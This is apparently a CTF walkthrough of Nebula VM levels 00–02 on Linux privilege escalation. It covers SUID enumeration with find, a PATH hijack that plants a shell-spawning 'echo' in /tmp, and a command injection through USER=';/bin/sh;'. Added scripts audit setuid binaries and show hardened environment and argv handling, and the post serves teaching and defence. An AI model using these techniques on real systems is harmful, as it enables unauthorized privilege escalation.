Day 29: Set User ID & Environment Variable Injection (PATH & USER) for Linux Priv. Esc.
To follow along, get the Nebula VM from Exploit Education…
Level 00 (Set User ID)
Finding the files and ignoring errors…
find / -perm /4000 2>/dev/null
A lot of these are common Linux files that are Set User ID, so over time you get to know them and ignore them, unless you're in a CTF that is trolling you and the issue is in a common binary. So always check anyway if you're at a dead end, or if it's an old version that has known vulnerabilities.
Of course “/bin/…/flag00” is seriously suspect, so we try this…
level00@nebula:~$ /bin/.../flag00
Congrats, now run getflag to get your flag!
flag00@nebula:~$ getflag
You have successfully executed getflag on a target account
It really was that easy, but do not underestimate the power of Set User ID: it has allowed me to priv. esc. more times than I can recall. It's powerful, it's common, use it! Always check permissions!
Search for SUID/GUID binaries
find / -maxdepth 6 \( -perm -g=s -o -perm -4000 \) ! -type l -exec ls -ld {} \; 2>/dev/null
find / -perm -1000 -type d 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
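Once you have the list, the defensive counterpart is to diff it against a known-good baseline and to flag anything sitting in an odd place, such as the hidden "..." directory used by level 00. The script below is an added example written for this writeup, not code from the Nebula project; the sample find output and the baseline are constructed inline so it runs anywhere without touching the real filesystem.

```shell
#!/bin/sh
# Added audit script (not from the original post or the Nebula project):
# compare discovered setuid/setgid binaries against a known-good baseline
# and flag ones in odd locations, such as a hidden "..." directory.

# Constructed sample output, standing in for the real
#   find / -perm -4000 -o -perm -2000 -type f 2>/dev/null
SAMPLE_FOUND='/usr/bin/passwd
/usr/bin/sudo
/bin/.../flag00
/home/flag01/flag01
/usr/bin/mount'

# Constructed baseline: the setuid binaries expected on this host,
# e.g. recorded from a freshly installed system of the same release.
SAMPLE_BASELINE='/usr/bin/passwd
/usr/bin/sudo
/usr/bin/mount
/bin/su'

# Print each path in the newline-separated list $1 that is absent from
# the newline-separated baseline $2.
not_in_baseline() {
    found=$1
    baseline=$2
    printf '%s\n' "$found" | while IFS= read -r p; do
        [ -n "$p" ] || continue
        if ! printf '%s\n' "$baseline" | grep -qxF -- "$p"; then
            printf '%s\n' "$p"
        fi
    done
    return 0
}

# Succeed (return 0) when a path lives under a user-writable tree or has a
# hidden component: a dot-name other than "." or "..", which is exactly how
# /bin/.../flag00 hides in plain sight.
is_odd_location() {
    case "$1" in
        /home/*|/tmp/*|/var/tmp/*|/dev/shm/*) return 0 ;;
    esac
    old_ifs=$IFS
    IFS=/
    set -- $1
    IFS=$old_ifs
    for comp in "$@"; do
        case "$comp" in
            .|..|"") ;;
            .*) return 0 ;;
        esac
    done
    return 1
}

# Report "NEW <path>" for binaries missing from the baseline and
# "ODD <path>" for suspicious locations; a path may earn both tags.
audit_suid() {
    found=$1
    baseline=$2
    not_in_baseline "$found" "$baseline" | while IFS= read -r p; do
        printf 'NEW %s\n' "$p"
    done
    printf '%s\n' "$found" | while IFS= read -r p; do
        if [ -n "$p" ] && is_odd_location "$p"; then
            printf 'ODD %s\n' "$p"
        fi
    done
    return 0
}

audit_suid "$SAMPLE_FOUND" "$SAMPLE_BASELINE"
```

On a real host you would replace the two constructed lists with the output of the find commands above and a baseline captured from a clean install; anything tagged NEW or ODD is what a CTF author (or an attacker) planted.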
Level 01 (Environment Variable Injection — PATH)
Challenge source is provided, can we spot the vulnerability?
We know we can alter environment variables, and that the program does the following:
it calls setresuid(), which sets the real user ID, the effective user ID, and the saved set-user-ID of the calling process, and setresgid(), which sets the real GID, effective GID, and saved set-group-ID of the calling process.
With the source code, and access to the server, it’s easy to spot the issue:
-rwsr-x--- 1 flag01 level01 7322 2011-11-20 21:22 flag01
If we can change our executable $PATH so that it checks /tmp first, a place we know we can write to, then we can put our own ‘echo’ binary there, which will allow us to call a system process as flag01. Our echo program will simply spawn a new shell.
nano /tmp/echo.c
cc /tmp/echo.c -o /tmp/echo
export PATH=/tmp/:$PATH
cd /home/flag01
./flag01
getflag
Level 02 (Environment Variable Injection — USER)
We get the source again for this.
This one is easy: we can just inject a command into the USER environment variable.
cd /home/flag02
USER=";/bin/sh;"
./flag02
getflag
The two semicolons around “/bin/sh” in the command injection are important, as bash needs them to separate the commands; otherwise it would just run “echo /bin/sh is cool”, which of course is useless to us.
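Both of these levels come down to the same mistake in a privileged program: building a command string and letting a shell resolve and re-parse it. The script below is an added demonstration for this writeup, not the Nebula challenge source or the original post's code. It assumes the challenge binaries run their command through system(), i.e. through "sh -c", and it runs entirely unprivileged in a scratch directory: the planted "echo" only prints a marker, and the injected value only runs a harmless echo, so the point is the resolution and parsing behaviour, shown next to the hardened form of each call.

```shell
#!/bin/sh
# Added demonstration (not from the original post or the Nebula project).
# Runs as an ordinary user in a scratch directory; the planted "echo" only
# prints a marker, so nothing happens beyond the lookup going wrong.

scratch=$(mktemp -d)
trap 'rm -rf "$scratch"' EXIT

# Constructed stand-in for a planted binary: a script named "echo" that
# announces itself instead of echoing its arguments.
printf '#!/bin/sh\necho PLANTED-ECHO-RAN\n' > "$scratch/echo"
chmod +x "$scratch/echo"

# Level 01 pattern: "env echo ..." looks echo up through PATH, and PATH is
# inherited from whoever started the program.
resolve_via_caller_path() {
    PATH="$scratch:$PATH" env echo 'and now what?'
}

# Hardened: start from an empty environment with a fixed PATH and name the
# binary by absolute path, so the caller's PATH never enters the lookup.
resolve_with_clean_env() {
    env -i PATH=/usr/bin:/bin /bin/echo 'and now what?'
}

# Level 02 pattern: the untrusted value is spliced into one command string,
# which "sh -c" (what system() runs) re-parses; a ';' in the value ends the
# echo command and starts a new one.
greet_by_string() {
    sh -c "/bin/echo $1 is cool"
}

# Hardened: hand the value to the shell as a positional parameter; the shell
# expands "$1" after parsing, so its contents are never treated as syntax.
greet_by_argv() {
    sh -c '/bin/echo "$1" is cool' greet "$1"
}

printf 'PATH lookup, caller-controlled : '; resolve_via_caller_path
printf 'PATH lookup, clean environment : '; resolve_with_clean_env
printf 'string splice, value ";echo INJECTED;" :\n'
greet_by_string ';echo INJECTED;' 2>/dev/null \
    || printf '(exit %s: the trailing words ran as a command)\n' "$?"
printf 'argument passing, same value   : '; greet_by_argv ';echo INJECTED;'
```

The first pair shows why a setuid program must not trust the PATH it inherits; the second shows that the fix for the USER problem is not escaping the value but never letting the shell parse it at all. In C the equivalent of the hardened calls is clearing the environment and using execve() with an explicit argv and an absolute path rather than system().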